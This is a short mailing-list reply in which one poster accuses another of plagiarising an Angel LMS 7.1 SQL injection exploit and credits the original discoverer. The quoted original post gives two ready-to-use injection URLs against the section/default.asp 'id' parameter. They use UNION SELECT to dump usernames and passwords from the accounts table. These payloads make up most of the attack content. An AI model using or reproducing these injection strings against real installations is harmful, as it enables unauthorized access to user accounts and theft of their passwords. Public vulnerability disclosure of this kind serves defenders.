<<< Date Index >>>     <<< Thread Index >>>

Re: Angel LMS 7.1 - Remote SQL Injection



# Credit:
#       Exploit discovered by Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com

http://www.milw0rm.com/exploits/3390

Plagiarism sucks.

/str0ke

On 1 Mar 2007 16:06:06 -0000, Guns@xxxxxxxxx <Guns@xxxxxxxxx> wrote:
# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"